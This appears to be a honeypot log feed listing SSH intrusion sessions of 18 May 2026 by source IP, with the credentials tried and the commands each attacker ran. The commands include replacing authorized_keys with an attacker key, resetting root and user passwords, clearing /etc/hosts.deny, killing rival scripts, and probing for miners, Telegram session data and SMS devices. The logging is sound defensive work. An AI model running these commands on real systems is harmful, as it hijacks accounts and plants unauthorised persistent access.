🎭 liberty_root_38 (104.168.93.72) β€” Buffalo, United States Β· 3 sessions Β· 3 cmds
2026-05-18 17:00 EDT Β· as git/git, root/12345, root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—3
🎭 hanbok_root_17 (14.52.46.79) β€” Seongnam-si, South Korea Β· 1 session Β· 9 cmds
2026-05-18 15:32 EDT Β· as root/12345
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 burger_root_51 (43.135.182.112) β€” Santa Clara, United States Β· 1 session Β· 2 cmds
2026-05-18 15:04 EDT Β· as root/hipchat
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 burger_root_52 (50.6.224.135) β€” Ashburn, United States Β· 1 session Β· 19 cmds
2026-05-18 15:04 EDT Β· as root/hipchat
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2rKM57acTZgJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_82 (38.22.170.10) β€” Guadalajara, Mexico Β· 3 sessions Β· 58 cmds
2026-05-18 13:14 EDT Β· as root/ghost123, root/parola123, user/testtesttest
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "testtesttest\n4ewxtcPYdzQ2\n4ewxtcPYdzQ2"|passwd|bash
$ Enter new UNIX password:
$ echo "testtesttest\n4ewxtcPYdzQ2\n4ewxtcPYdzQ2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:2XvZbkS8PV3r"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:wZNs51Brb2fu"|chpasswd|bash
🎭 liberty_root_39 (43.153.32.106) β€” Santa Clara, United States Β· 3 sessions Β· 58 cmds
2026-05-18 13:12 EDT Β· as root/ghost123, root/parola123, user/testtesttest
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:bEm5sJJoperM"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "testtesttest\nzYSHkktGZd9X\nzYSHkktGZd9X"|passwd|bash
$ Enter new UNIX password:
$ echo "testtesttest\nzYSHkktGZd9X\nzYSHkktGZd9X\n"|passwd
$ echo "root:3iHMdafUgKDk"|chpasswd|bash
🎭 hanbok_root_18 (118.33.113.91) β€” Mapo-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-18 13:26 EDT Β· as admin1/P@ssw0rd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nvQqnRfEtRI12\nvQqnRfEtRI12"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nvQqnRfEtRI12\nvQqnRfEtRI12\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_14 (43.156.63.254) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-18 13:05 EDT Β· as user/testtesttest
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "testtesttest\ndge7LYKvkbwa\ndge7LYKvkbwa"|passwd|bash
$ Enter new UNIX password:
$ echo "testtesttest\ndge7LYKvkbwa\ndge7LYKvkbwa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_16 (103.38.219.22) β€” Lucknow, India Β· 2 sessions Β· 38 cmds
2026-05-18 12:06 EDT Β· as root/01233210, root/vmware1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:VhjF8pOniCLt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:rQUfzXabUrEO"|chpasswd|bash
🎭 wok_root_25 (220.205.122.34) β€” Hefei, China Β· 1 session Β· 20 cmds
2026-05-18 12:13 EDT Β· as gino/password
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\nKnAS4XAkBN3I\nKnAS4XAkBN3I"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nKnAS4XAkBN3I\nKnAS4XAkBN3I\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_104 (36.50.176.144) β€” QuαΊ­n Hai, Vietnam Β· 1 session Β· 19 cmds
2026-05-18 12:02 EDT Β· as root/bonnie
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:gJPGEBeillKp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_39 (40.112.183.29) β€” San Francisco, United States Β· 1 session Β· 19 cmds
2026-05-18 11:58 EDT Β· as root/bonnie
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EQVtAGHnuC5j"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_96 (154.221.19.230) β€” Chai Wan, Hong Kong Β· 1 session Β· 19 cmds
2026-05-18 11:51 EDT Β· as root/01233210
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:LzA7lsNcpyCI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_33 (203.3.119.121) β€” Hangzhou, China Β· 1 session Β· 1 cmd
2026-05-18 11:04 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 ghost_root_105 (43.134.71.92) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-18 10:50 EDT Β· as root/jcarlos
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ttHENGPIvMCx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_53 (43.159.170.199) β€” Santa Clara, United States Β· 2 sessions Β· 39 cmds
2026-05-18 10:47 EDT Β· as root/ch123456, webuser/webuser@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:BvEpHsVTBfGR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "webuser@123\nTGDzJwK684mh\nTGDzJwK684mh"|passwd|bash
$ Enter new UNIX password:
$ echo "webuser@123\nTGDzJwK684mh\nTGDzJwK684mh\n"|passwd
🎭 yankee_root_41 (49.51.196.200) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 10:48 EDT Β· as root/dolphin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:J2yBTwtabROj"|chpasswd|bash
